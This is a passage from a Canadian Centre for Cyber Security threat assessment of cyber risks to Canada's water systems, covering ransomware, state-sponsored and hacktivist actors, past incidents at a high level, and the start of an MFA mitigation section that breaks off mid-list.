Canadian Centre for Cyber Security Events

<article data-history-node-id="7040" about="/en/news-events/backgrounder-malicious-cyber-activity-targeting-canadian-critical-infrastructure" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> </div> </div> </div> </article>

<article data-history-node-id="6961" about="/en/guidance/cyber-threat-canadas-water-systems-assessment-mitigation" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><section><details class="mrgn-bttm-lg"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#0">About this document</a></li> <li><a href="#1">Message from the Head of the Cyber Centre</a></li> <li><a href="#2">Key judgements</a></li> <li><a href="#3">Canada’s water sector</a></li> <li><a href="4">The threat from cybercriminals</a></li> <li><a href="#5">The state-sponsored cyber threat to water systems</a></li> <li><a href="#6">Non-state cyber actors: A growing threat</a></li> <li><a href="7">Outlook: What this means for the Canadian Water Sector</a></li> <li><a href="#8">Mitigation</a></li> <li><a href="#9">Additional resources</a></li> <li><a href="#10">References</a></li> </ul></details></section><section><h2 class="text-info page-header mrgn-tp-lg" id="0">About this document</h2> <h3>Audience</h3> <p>This report is part of a series of cyber threat assessments focused on Canada’s critical infrastructure. It is intended for leaders of organizations in the water sector, cyber security professionals with a water or wastewater asset to protect, and the general reader with an interest in the cyber security of critical infrastructure. For guidance on technical mitigation of these threats, see the Mitigation section or contact the Canadian Centre for Cyber Security (the Cyber Centre).</p> <p>This assessment is Unclassified/TLP:CLEAR. TLP:CLEAR is used when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information, see <a href="https://www.first.org/tlp/">Traffic Light Protocol</a>.</p> <h3>Contact</h3> <p>For follow-up questions or issues, contact the Cyber Centre at <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a>.</p> <h3>Assessment base and methodology</h3> <p>The key judgements in this assessment rely on reporting from multiple sources, both classified and unclassified. The judgements are based on the knowledge and expertise in cyber security of the Cyber Centre. Defending the Government of Canada’s information systems provides the Cyber Centre with a unique perspective to observe trends in the cyber threat environment, which also informs our assessments. The Communications Security Establishment Canada’s foreign intelligence mandate provides us with valuable insight into adversary behaviour in cyberspace. While we must always protect classified sources and methods, we provide the reader with as much justification as possible for our judgements.</p> <p>Our judgements are based on an analytical process that includes evaluating the quality of available information, exploring alternative explanations, mitigating biases and using probabilistic language. We use terms such as “we assess” or “we judge” to convey an analytic assessment. We use qualifiers such as “possibly”, “likely” and “very likely” to convey probability.</p> <p>The assessments and analysis are based on information available as of <strong>May 31, 2025</strong>.</p> <h3>Estimative language</h3> <img alt="Estimated language chart long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/tdp4-language-chart-e.jpg" /><details class="mrgn-bttm-lg"><summary>Long description – Estimative language chart </summary><ul class="list-unstyled mrgn-tp-md"><li>1 to 9% Almost no chance</li> <li>10 to 24% Very unlikely/Very Improbable</li> <li>25 to 39% Unlikely/Improbable</li> <li>40 to 59% Roughly even chance</li> <li>60 to 74% Likely/probably</li> <li>75 to 89% Very likely/very probable</li> <li>90 to 100% Almost certainly</li> </ul></details><div class="clearfix"> </div> </section><section><h2 class="text-info page-header mrgn-tp-xl" id="1">Message from the Head of the Cyber Centre</h2> <p>I spend a lot of time looking at threats most people never see. They are quiet, often hidden, yet capable of real-world consequences. Among the most critical are the cyber threats facing Canada’s water and wastewater systems. These systems are the backbone of modern life, yet they’re often out of sight and out of mind. When they function, no one notices. When they fail, everyone does.</p> <p>This assessment is meant to bring clarity to a topic that can feel abstract or overly technical. Cyber threats to water infrastructure are growing, evolving quickly, and can affect every community in Canada. You don’t need to be an engineer or a cyber security expert to understand why this matters. Clean water is essential, and the systems that deliver it are now largely digital – meaning they are vulnerable to the same kinds of cyber threats that target businesses and governments around the world.</p> <p>We’ve seen an unmistakable shift in recent years. Cybercriminals are more sophisticated, state-sponsored actors are more willing to target essential services, and disruptive tools are easier to access. Water systems now face a threat landscape they were never designed to withstand.</p> <p>Whether you’re a critical infrastructure executive, an elected official, or a policymaker, I want to emphasize that cyber security for water systems is not just a technical issue, it is a public safety issue, an economic stability issue, and ultimately a public trust issue. Leadership matters. The choices you make about investment, governance, and preparedness will determine our collective resilience in the years ahead.</p> <p>But this is not a message of alarm; it is a message of readiness. Across Canada, utilities, municipalities, and provincial and territorial partners have shown a strong commitment to improving their cyber resilience. What’s needed now is a clear-eyed analysis of the cyber threats facing our water systems in Canada. That’s what this assessment provides.</p> <p>My hope is that it empowers decision-makers to act confidently, ask the right questions, and support the people who keep these systems running. Cyber threats aren’t going away, but with awareness and a steady commitment to resilience, we can stay ahead of them.</p> <p>Sincerely,<br /><strong>Rajiv Gupta, Head of the Canadian Centre for Cyber Security</strong></p> <h2 class="text-info page-header mrgn-tp-lg" id="2">Key judgements</h2> <ul><li>We assess that operational technology (OT) networks that monitor and control physical processes are very likely the primary target for actors seeking to disrupt water systems.</li> <li>We assess that financially motivated cybercriminals are the most likely cyber threat to affect water systems. We assess that cybercriminals will almost certainly continue to exploit water sector organizations and systems through extortion tied to ransomware, exploiting stolen information, and business email compromise (BEC). We assess that ransomware is almost certainly the most significant cyber threat to the reliable supply of water in Canada due to the potential impacts against <abbr title="operational technology">OT</abbr> systems.</li> <li>We assess that water systems are almost certainly a strategic target for state-sponsored actors to project power through disruptive or destructive cyber threat activity. We assess that state-sponsored actors have almost certainly developed pre-positioned access to Canadian water systems. However, we judge that these actors would likely only disrupt those water systems in times of crisis or conflict between states.</li> <li>Non-state cyber actors are a growing threat to Canada’s critical infrastructure (CI). We assess that non-state actors will very likely continue to opportunistically compromise and disrupt Internet-exposed water system <abbr title="operational technology">OT</abbr> within Canada, especially in connection to major geopolitical events.</li> </ul></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section class="mrgn-tp-lg"><h2 class="text-info page-header mrgn-tp-lg" id="3">Canada’s water sector</h2> <p>Good public and environmental health depend on access to clean water.<sup id="fn1-rf"><a class="fn-lnk" href="#fn1"><span class="wb-inv">Footnote </span>1</a></sup>  Drinking water, stormwater and wastewater treatment systems (collectively: <strong>water systems</strong>) have many important economic, environmental, and safety uses. A loss of water does not just affect residents but also can have effects on other critical infrastructure. For example, in 2024, water main breaks in Calgary and Montreal resulted in cascading impacts on other systems, including hospitals, fire prevention and universities.<sup id="fn2-rf"><a class="fn-lnk" href="#fn2"><span class="wb-inv">Footnote </span>2</a></sup>  For these reasons and others, our water systems are considered part of Canada’s critical infrastructure (Figure 1).<sup id="fn3-rf"><a class="fn-lnk" href="#fn3"><span class="wb-inv">Footnote </span>3</a></sup>  Any disruption in the water system is not only a threat to public health and safety, but also a threat to public confidence, the environment and the economy.<sup id="fn4-rf"><a class="fn-lnk" href="#fn4"><span class="wb-inv">Footnote </span>4</a></sup>  As a result, the cyber security of our water systems is vital to Canada’s national security.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center"><strong>Figure 1: Critical infrastructure</strong></figcaption><p>Critical infrastructure refers to the processes, systems, facilities, technologies, networks, assets and services essential to the health, safety, security or economic well-being of Canadians and the effective functioning of government.</p> <img alt="Figure 1 – Long description immediately follows" class="img-responsive center-block" src="/sites/default/files/images/ncta-2023-fig5.jpg" /></figure><details><summary>Long description – Figure 1: Critical infrastructure</summary> Icons representing the 10 critical infrastructure sectors in Canada <ul><li>Energy and utilities</li> <li>Finance</li> <li>Food</li> <li>Health</li> <li>Government</li> <li>Safety</li> <li>Water</li> <li>Transportation</li> <li>Information and communication technology</li> <li>Manufacturing</li> </ul></details></div> </div> <h3>The threat surface of Canada’s water systems</h3> <p>A water system generally includes the services and infrastructure to safely and reliably obtain, store, filter and distribute potable water, divert runoff and floodwater as well as remove, collect and treat wastewater. Canada has thousands of water systems that vary greatly in size. A small number of large water utilities serve major urban areas while international organizations manage shared systems. Meanwhile, many small systems are owned and operated by municipalities, other levels of government, Indigenous communities, private sector companies and individual citizens.<sup id="fn5-rf"><a class="fn-lnk" href="#fn5"><span class="wb-inv">Footnote </span>5</a></sup></p> <p>Water systems operate in a variety of ways. Many are completely manual or even passive systems that require little to no active management, including most small water supplies and stormwater systems. Large urban water systems, in contrast, are usually geographically dispersed, industrial systems operated from a digital control environment. These include many remotely managed <abbr title="operational technology">OT</abbr> devices integrated into dams, pumping stations, and treatment facilities. These systems also extend into a web of connected suppliers of digital products and services.</p> <p>Many of these water systems are managed out of municipal or community offices and are exposed to all the cyber threats encountered by public-facing organizations. The more internet-connected assets an organization has, the larger the threat surface. A larger threat surface implies an increase in the cyber threat the organization faces.<sup id="fn6-rf"><a class="fn-lnk" href="#fn6"><span class="wb-inv">Footnote </span>6</a></sup>  In addition to increasing internet connectivity, most water systems are operated by small public sector organizations and frequently face challenges that can negatively influence cyber security, including low financial resources, aging physical and digital infrastructure and a shortage of cyber security expertise.<sup id="fn7-rf"><a class="fn-lnk" href="#fn7"><span class="wb-inv">Footnote </span>7</a></sup></p> <h4>The role of operational technology in our water systems</h4> <p>Operators use industrial <abbr title="operational technology">OT</abbr> including supervisory control and data acquisition (SCADA) and industrial Internet of things (IIoT) devices to manage large water systems and address issues like population growth, outdated infrastructure and declining revenue.<sup id="fn8-rf"><a class="fn-lnk" href="#fn8"><span class="wb-inv">Footnote </span>8</a></sup>  These systems are used to control water system equipment like dam gates, valves and pumps and to monitor sensors such as chemical detectors and flowrate monitors. The <abbr title="operational technology">OT</abbr> in water systems is continually evolving and is increasingly managed through digital devices with embedded computing and communications abilities.<sup id="fn9-rf"><a class="fn-lnk" href="#fn9"><span class="wb-inv">Footnote </span>9</a></sup>  This process, called digital transformation or digitalization, has allowed <abbr title="operational technology">OT</abbr> asset operators like those in the water sector to connect their <abbr title="operational technology">OT</abbr> devices to operating centres, corporate networks and, increasingly, directly to the internet. A 2021 survey counted over 60,000 <abbr title="operational technology">OT</abbr>-related network interfaces in Canada.<sup id="fn10-rf"><a class="fn-lnk" href="#fn10"><span class="wb-inv">Footnote </span>10</a></sup>  In 2023, a similar survey conducted on internet-connected devices associated mainly with water systems in the U.S. and UK found a relatively low level of basic cyber hygiene. Almost half of the devices could be manipulated without any authentication required.<sup id="fn11-rf"><a class="fn-lnk" href="#fn11"><span class="wb-inv">Footnote </span>11</a></sup></p> <p>Unfortunately, the management efficiency and savings gained from connecting digitally transformed <abbr title="operational technology">OT</abbr> also exposes the water system to cyber threats.<sup id="fn10a-rf"><a class="fn-lnk" href="#fn10"><span class="wb-inv">Footnote </span>10</a></sup>  For example, in early 2000, an employee was fired from a company providing services to Maroochy Water Services in Queensland, Australia. The individual retained remote access to the network of <abbr title="operational technology">OT</abbr> devices in the pumping stations of the wastewater treatment system.<sup id="fn12-rf"><a class="fn-lnk" href="#fn12"><span class="wb-inv">Footnote </span>12</a></sup>  He used this access to issue malicious commands to the <abbr title="operational technology">OT</abbr> devices that ultimately caused nearly a million litres of raw sewage to be discharged into local parks and rivers, causing severe environmental harm, according to officials.<sup id="fn13-rf"><a class="fn-lnk" href="#fn13"><span class="wb-inv">Footnote </span>13</a></sup>  This was the first example of a remote access in a public water system being used to disrupt or sabotage <abbr title="operational technology">OT</abbr> systems, and illustrates the potential for cyber threats to jeopardize public and environmental safety and the local economy.<sup id="fn10b-rf"><a class="fn-lnk" href="#fn10"><span class="wb-inv">Footnote </span>10</a></sup>  <strong>We assess that operational technology (OT) networks that monitor and control physical processes are very likely the primary target for actors seeking to disrupt water systems</strong>.</p> <h4>On the rise: Cyber threats to supply chains</h4> <p>Water system utilities often depend on a diverse supply chain of digital products and services to operate, maintain and modernize their <abbr title="operational technology">OT</abbr> assets. The supply chain for these products and services includes manufacturers, vendors, integrators, contractors and service providers. Water system <abbr title="operational technology">OT</abbr>’s dependency on the supply chain is a critical vulnerability that gives cyber actors inside information on and opportunities for access to otherwise protected <abbr title="operational technology">OT</abbr> systems.</p> <p>Cyber threat actors target organizations’ digital supply chains to collect business and contextual information for use in social engineering attacks or to collect organizational network and system information to support future cyber attacks. Activity against the digital supply chain can also be an indirect route to gain access to the target organization’s networks in situations where there is continuous information transfer, for example software updates, or remote network access connections between the organization and its suppliers. In late 2019, a sophisticated cyber threat actor compromised the software-as-a-service provider, SolarWinds. The actors, attributed to Russia’s intelligence services, used their access to SolarWinds’ development environment to embed malicious code into a software update. The compromised update provided the actors access to thousands of client networks worldwide, including over 100 in Canada.<sup id="fn14-rf"><a class="fn-lnk" href="#fn14"><span class="wb-inv">Footnote </span>14</a></sup></p> <h4>Publicly available cyber tools are increasing the volume and effectiveness of cyber threat activity</h4> <p><strong>We assess it almost certain that cyber threat actors are increasingly using publicly available cyber tools to gain and maintain access to <abbr title="critical infrastructure">CI</abbr> networks, making it easier for threat actors of all levels of sophistication to target water sector <abbr title="operational technology">OT</abbr>.</strong> The wide availability of these tools, including legitimate penetration testing tools like Cobalt Strike, has lowered the barrier to entry to cyber threat activity and increased the capacity for cyber threat actors to gain, maintain, and expand access to target systems.<sup id="fn15-rf"><a class="fn-lnk" href="#fn15"><span class="wb-inv">Footnote </span>15</a></sup></p> <p>The proliferation of publicly available cyber tools has advantages for sophisticated cyber threat actors as well. Advanced cyber threat actors often use a combination of publicly available tools and living-off-the-land (LOTL) techniques when possible and bespoke malware when necessary. For example, People’s Republic of China (PRC) threat actors Volt Typhoon, Flax Typhoon and APT40 commonly use a mixed toolset and likely maintain an extensive catalog of open source and custom malware.<sup id="fn16-rf"><a class="fn-lnk" href="#fn16"><span class="wb-inv">Footnote </span>16</a></sup>  <abbr title="living-off-the-land">LOTL</abbr> techniques exclusively rely on legitimate tools and processes already present in the victim’s environment, for example Windows PowerShell or Windows Management Instrumentation, to carry out malicious activity.<sup id="fn17-rf"><a class="fn-lnk" href="#fn17"><span class="wb-inv">Footnote </span>17</a></sup>  These techniques allow threat actors to blend their malicious activity in with normal network activity. By using generic publicly available tools and <abbr title="living-off-the-land">LOTL</abbr> techniques, sophisticated actors limit the distinct signature they leave on a target’s network, making detecting cyber threat activity and attributing the source of that activity even more challenging.<sup id="fn18-rf"><a class="fn-lnk" href="#fn18"><span class="wb-inv">Footnote </span>18</a></sup></p> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info page-header mrgn-tp-lg" id="4">The threat from cybercriminals</h2> <p><strong>We assess that financially motivated cybercriminals are the most likely cyber threat to affect water systems. We assess that cybercriminals will almost certainly continue to exploit water sector organizations and systems through extortion tied to ransomware, exploiting stolen information and business email compromise (BEC).</strong> <abbr title="business email compromise">BEC</abbr> is a type of fraud that uses compromised email accounts to trick people into transferring money or sensitive information to attacker-controlled accounts, while ransomware is malware that encrypts data or locks devices to extort a target organization for ransom payment.<sup id="fn19-rf"><a class="fn-lnk" href="#fn19"><span class="wb-inv">Footnote </span>19</a></sup>  Although <abbr title="business email compromise">BEC</abbr> is likely more common and more costly than ransomware to victims, ransomware can disrupt operations such as the delivery of safe drinking water through loss of visibility or control over important industrial processes.<sup id="fn20-rf"><a class="fn-lnk" href="#fn20"><span class="wb-inv">Footnote </span>20</a></sup>  <strong>We assess that ransomware is almost certainly the most significant cyber threat to the reliable supply of water in Canada due to the potential impacts against <abbr title="operational technology">OT</abbr> systems.</strong> Cybercriminals are aware that the disruption of critical products and services increases the pressure on an organization to pay ransom.<sup id="fn21-rf"><a class="fn-lnk" href="#fn21"><span class="wb-inv">Footnote </span>21</a></sup>  For example, ransomware attacks disrupted water treatment systems in California, Maine and Nevada in 2021, and in Kansas in 2024, forcing system operators to manually operate their <abbr title="operational technology">OT</abbr> systems to maintain service.<sup id="fn22-rf"><a class="fn-lnk" href="#fn22"><span class="wb-inv">Footnote </span>22</a></sup></p> <h3>Ransomware incidents are becoming more complex and costly to remediate</h3> <p><strong>We assess that ransomware attacks against <abbr title="critical infrastructure">CI</abbr> organizations, including those in the water sector, are almost certainly becoming more frequent as well as more costly and complex to remediate.</strong> The number of observed ransomware incidents has increased across sectors from 2021 to 2024. The size of ransom demands, cost of recovery, and the sophistication and complexity of tactics being used by cybercriminals have also increased.<sup id="fn23-rf"><a class="fn-lnk" href="#fn23"><span class="wb-inv">Footnote </span>23</a></sup>  These trends are driven by the proliferation of ransomware-as-a-service (RaaS) variants, the cybercrime-as-a-service (CaaS) ecosystem, and the increased use of multiple extortion methods.<sup id="fn24-rf"><a class="fn-lnk" href="#fn24"><span class="wb-inv">Footnote </span>24</a></sup></p> <p>Cybercriminals have widely adopted the practice of stealing and threatening to leak their victims’ sensitive data as either a supplement to traditional encryption-based extortion or as the primary lever for extortion. In early 2023, the cybercriminal group CL0P exploited a vulnerability in MOVEit Transfer, a file transfer tool made by Progress Software. CL0P’s attacks were far-reaching, allowing them to steal information from government, public and business groups all over the world, including the water utility files of Queens Municipality in Nova Scotia.<sup id="fn25-rf"><a class="fn-lnk" href="#fn25"><span class="wb-inv">Footnote </span>25</a></sup>  In early 2024, 2 different cybercriminal groups conducted ransomware attacks against water sector organizations in North America and the United Kingdom. The groups disrupted <abbr title="information technology">IT</abbr> systems and leaked stolen data including business data and personal information.<sup id="fn26-rf"><a class="fn-lnk" href="#fn26"><span class="wb-inv">Footnote </span>26</a></sup></p> <h3>Cybercrime marketplaces provide specialized services and increase impacts against victims</h3> <p>Cybercrime is continuously evolving to maximize profits and increase the payouts extracted from targets.<sup id="fn27-rf"><a class="fn-lnk" href="#fn27"><span class="wb-inv">Footnote </span>27</a></sup>  The <abbr title="cybercrime-as-a-service">CaaS</abbr> ecosystem allows for specialization and division of labour among cybercriminal groups. This allows cybercriminals to access a range of services including network access brokering, access to <abbr title="ransomware-as-a-service">RaaS</abbr> variants and money laundering. Access brokers opportunistically collect network accesses into victim organizations and sell them to other cybercriminals. Those cybercriminals then conduct reconnaissance and use social engineering to determine which targets to deploy ransomware against. These decisions are often based on which organizations are most likely and/or able to pay a ransom.<sup id="fn19a-rf"><a class="fn-lnk" href="#fn19"><span class="wb-inv">Footnote </span>19</a></sup><sup id="fn27a-rf"><a class="fn-lnk" href="#fn27"><span class="wb-inv">Footnote </span>27</a></sup>  <strong>We assess that the <abbr title="cybercrime-as-a-service">CaaS</abbr> ecosystem is almost certainly increasing the number of actors participating in cybercrime by enabling less technically sophisticated actors to carry out cyber threat activity.</strong></p> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info page-header mrgn-tp-lg" id="5">The state-sponsored cyber threat to water systems</h2> <p><strong>We assess that water systems are almost certainly a strategic target for state-sponsored actors to project power through disruptive or destructive cyber threat activity.</strong> State-sponsored actors pre-position for this activity by identifying and gaining access to Internet-connected <abbr title="operational technology">OT</abbr> systems or <abbr title="information technology">IT</abbr> networks from which they can laterally move to <abbr title="operational technology">OT</abbr> systems. Once in the target network, they collect information on assets within the network to identify opportunities for disruptive or destructive action. For example, this could mean causing water tanks to overflow or changing the chemical balance of water treatment processes. We assess that state-sponsored cyber threat actors have almost certainly developed pre-positioned access to Canadian water systems. However, we judge that these actors would likely only disrupt those water systems in times of crisis or conflict between states.</p> <p>State-sponsored cyber threat actors have targeted water sector organizations and systems globally for both espionage and disruption or destruction. In an early example of state-sponsored cyber activity in water system <abbr title="operational technology">OT</abbr>, in 2013, Iranian actors gained access to the <abbr title="supervisory control and data acquisition">SCADA</abbr> system of a small dam in New York State. This access allowed them to obtain information regarding the dam’s status and the ability to operate the sluice gates of the dam, which could affect water levels and flow rates in the watershed. The system was under maintenance at the time of the compromise, so the actors did not obtain actual access to the dam’s physical controls.<sup id="fn28-rf"><a class="fn-lnk" href="#fn28"><span class="wb-inv">Footnote </span>28</a></sup></p> <p>In 2023, an Iranian Revolutionary Guard Corps cyber unit acting under the non-state actor persona “CyberAv3ngers” compromised the Municipal Water Authority of Aliquippa, Pennsylvania. The CyberAv3ngers exploited a publicly exposed Unitronics Vision Series <abbr title="operational technology">OT</abbr> device with default passwords and defaced the system’s interface with an anti-Israel message. This activity was part of a broader campaign targeting commonly used Israeli-made <abbr title="operational technology">OT</abbr> devices, likely to undermine Western support for Israel. Tampering with the controller’s user interface implies a level of access that would allow full access to the device settings, as well as potential access to other devices on the network. It is not known if cyber activity beyond defacement was planned or carried out.<sup id="fn29-rf"><a class="fn-lnk" href="#fn29"><span class="wb-inv">Footnote </span>29</a></sup></p> <p>In 2023 and 2024, the Cyber Centre and its partners published the following joint advisories to warn critical infrastructure organizations of a <abbr title="People’s Republic of China">PRC</abbr> state-sponsored cyber group known as Volt Typhoon:</p> <ul><li><a href="https://www.cyber.gc.ca/en/news-events/joint-guidance-executives-and-leaders-critical-infrastructure-organizations-protecting-infrastructure-and-essential-functions-against-prc-cyber-activity">Joint guidance for executives and leaders of critical infrastructure organizations on protecting infrastructure and essential functions against <abbr title="People’s Republic of China">PRC</abbr> cyber activity</a></li> <li><a href="https://www.cyber.gc.ca/en/news-events/advisory-peoples-republic-china-state-sponsored-cyber-threat">CSE and its Canadian Centre for Cyber Security release advisory on People’s Republic of China state-sponsored cyber threat</a></li> <li><a href="https://www.cyber.gc.ca/en/news-events/joint-advisory-prc-state-sponsored-actors-compromising-and-maintaining-persistent-access-us-critical-infrastructure-and-joint-guidance-identifying-and-mitigating-living-land-0">Joint advisory on <abbr title="People’s Republic of China">PRC</abbr> state-sponsored actors compromising and maintaining persistent access to U.S. critical infrastructure and joint guidance on identifying and mitigating living off the land</a></li> </ul><p>Volt Typhoon activity has been observed since mid-2021 targeting the water sector and communication, transportation and energy organizations.<sup id="fn30-rf"><a class="fn-lnk" href="#fn30"><span class="wb-inv">Footnote </span>30</a></sup>  Volt Typhoon strategically selects targets, pre-positioning itself in organizations that, if disrupted, would restrict military mobilization efforts and cause societal chaos. While the Cyber Center assesses that the direct threat to Canada’s <abbr title="critical infrastructure">CI</abbr> by Volt Typhoon is less than that to the <abbr title="United States">U.S.</abbr>, it is not insignificant, especially for Canadian organizations that rely on cross-border trade, infrastructure or operations. In addition, the likelihood of a cyber attack impacting Canada’s <abbr title="critical infrastructure">CI</abbr> is higher than it otherwise might be because of the connections between US and Canadian infrastructure.</p> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info page-header mrgn-tp-lg" id="6">Non-state cyber actors: A growing threat</h2> <p>The Cyber Centre warned in our <a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a> that <strong>non-state cyber actors are a growing threat to Canada’s critical infrastructure</strong>. The wide proliferation of easy-to-use disruptive cyber capabilities has contributed to the emergence of a large eco-system of hacktivists and other non-state actors who opportunistically target Canada and its allies for a variety of reasons. Often, this activity is intended to intimidate or coerce its targets or to influence Canadian public opinion or policy decisions related to geopolitical events outside Canada.</p> <p>Non-state threat activity frequently targets public-facing websites through techniques including distributed denial-of-service (DDoS) and defacement attacks. However, some non-state actors have adopted the practice of targeting and attempting to disrupt vulnerable Internet-connected <abbr title="operational technology">OT</abbr> systems. Although non-state actors have targeted <abbr title="operational technology">OT</abbr> across <abbr title="critical infrastructure">CI</abbr> sectors, a notable proportion of this activity has implicated water system <abbr title="operational technology">OT</abbr>.</p> <p>In May 2024, the Cyber Centre and partners issued a joint advisory warning of pro-Russia non-state actors targeting Internet-exposed industrial systems. These actors opportunistically identify targets using publicly available scanning tools to search for internet-exposed systems with vulnerable configurations, such as using default or weak passwords or not using multi-factor authentication.<sup id="fn31-rf"><a class="fn-lnk" href="#fn31"><span class="wb-inv">Footnote </span>31</a></sup>  After gaining access to these systems, they attempt to disrupt the system by defacing system interfaces, making configuration changes, and manipulating system controls. This activity can result in <abbr title="operational technology">OT</abbr> systems operating in unintended ways, operational disruptions, and, potentially, physical damage to the systems. For example, in early 2024, a non-state actor compromised the <abbr title="operational technology">OT</abbr> systems controlling water storage tanks in the towns of Abernathy and Muleshoe, Texas and caused a tank overflow resulting in the loss of roughly 100,000 litres of water.<sup id="fn32-rf"><a class="fn-lnk" href="#fn32"><span class="wb-inv">Footnote </span>32</a></sup></p> <p>The Cyber Centre is aware of several instances of non-state actors similarly attempting to disrupt internet-exposed <abbr title="operational technology">OT</abbr> systems in Canada, including within water systems. <strong>We assess that non-state actors will very likely continue to opportunistically compromise and disrupt internet-exposed water system <abbr title="operational technology">OT</abbr> within Canada, especially in connection to major geopolitical events.</strong></p> <h2 class="text-info page-header mrgn-tp-lg" id="7">Outlook: What this means for the Canadian water sector</h2> <p>In the Cyber Centre’s <a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a>, we assess that the cyber threat to Canada’s critical infrastructure is almost certainly increasing. We judge that the primary threats to <abbr title="critical infrastructure">CI</abbr> come from cybercrime, state-sponsored adversaries and, increasingly, from non-state actors. Changes in the geopolitical environment have elevated the profile and importance of critical infrastructure as a target for cyber activity. This has combined with the increasing interconnectivity of <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> in the water sector to increase the cyber threat to the water supply.</p> <p>If Canada’s water infrastructure was to become a priority for state-sponsored actors, for example in the case of imminent or active armed conflict, we assess that any water system organizations with <abbr title="operational technology">OT</abbr> devices exposed to the Internet are almost certainly a target for disruptive cyber threat activity. Water systems may also be affected by cyber activity against other sectors due to the interconnected nature of infrastructure and supply chain complexity. For example, systems including water treatment plants, pumping stations, and distribution networks without backup power capacity may be vulnerable to disruptions in the energy sector, which may lead to interruptions in the treatment, storage and distribution of safe water to clients.</p> <p>Defending Canada’s water sector against cyber threats and related influence operations requires addressing both the technical and social elements of cyber threat activity. These include threats that originate in the digital supply chain, and the technology and skills shortage in the sector. There are almost certainly water system operators in Canada with exposed devices. The Cyber Centre encourages all critical infrastructure asset owners, including those in the water sector, to take appropriate mitigation measures to protect their systems against cyber threats.</p> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info page-header mrgn-tp-lg" id="8">Mitigation</h2> <div class="mrgn-tp-md" id="expands-collapse"> <p>The Cyber Centre is dedicated to advancing cyber security and increasing the confidence of Canadians in the systems they rely on daily. This includes offering support to <abbr title="critical infrastructure">CI</abbr> and other systems of importance to Canada. We approach security through collaboration, combining expertise from government, industry and academia. Working together, we can increase Canada’s resilience against cyber threats. Cyber security investments will allow <abbr title="operational technology">OT</abbr> asset operators to benefit from new technologies, while avoiding undue risks to the safe and reliable provision of critical services to Canadians.</p> <p>The following mitigation measures can help water systems operators prevent cyber threat actors from exploiting vulnerable systems, attacking devices and networks and stealing sensitive data. Each of the mitigations below are linked to the Cyber Centre’s <a href="https://www.cyber.gc.ca/en/cyber-security-readiness">Cyber Security Readiness Goals</a> (CRGs). The <abbr title="Cyber Security Readiness Goals">CRG</abbr>s are a set of baseline cyber security practices an organization can take to bolster their cyber security posture. Further details of each goal can be found in the <a href="https://www.cyber.gc.ca/en/cyber-security-readiness/cross-sector-cyber-security-readiness-goals-toolkit">Cross-Sector Cyber Security Readiness Goals Toolkit</a>. The mitigations below are highlighted to help prevent and reduce cyber attacks against the water sector.</p> <div class="btn-group mrgn-tp-sm mrgn-bttm-md"><button class="btn btn-primary wb-toggle" data-toggle="{&quot;selector&quot;: &quot;details&quot;, &quot;print&quot;: &quot;on&quot;, &quot;stateOn&quot;: &quot;on&quot;, &quot;stateOff&quot;: &quot;off&quot;, &quot;parent&quot;: &quot;#expands-collapse&quot;}" type="button">Expand | collapse all</button></div> <h3 class="mrgn-tp-md text-info">Protect all management interfaces</h3> <details><summary><h4>Phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> (CRG 2.7)</h4> </summary><p>Implement phishing-resistant multi-factor authentication (MFA) for access to assets, including all remote access to the <abbr title="operational technology">OT</abbr> network.<sup id="fn33-rf"><a class="fn-lnk" href="#fn33"><span class="wb-inv">Footnote </span>33</a></sup></p> <h5><abbr title="information technology">IT</abbr> accounts:</h5> <p>All <abbr title="information technology">IT</abbr> accounts should leverage <abbr title="multi-factor authentication">MFA</abbr> to access organizational resources. Prioritize accounts with the highest risk, such as privileged administrative accounts for key <abbr title="information technology">IT</abbr> systems.</p> <h5><abbr title="operational technology">OT</abbr> environments:</h5> <p>Enable <abbr title="multi-factor authentication">MFA</abbr> on all accounts and systems that can be accessed remotely, including:</p> 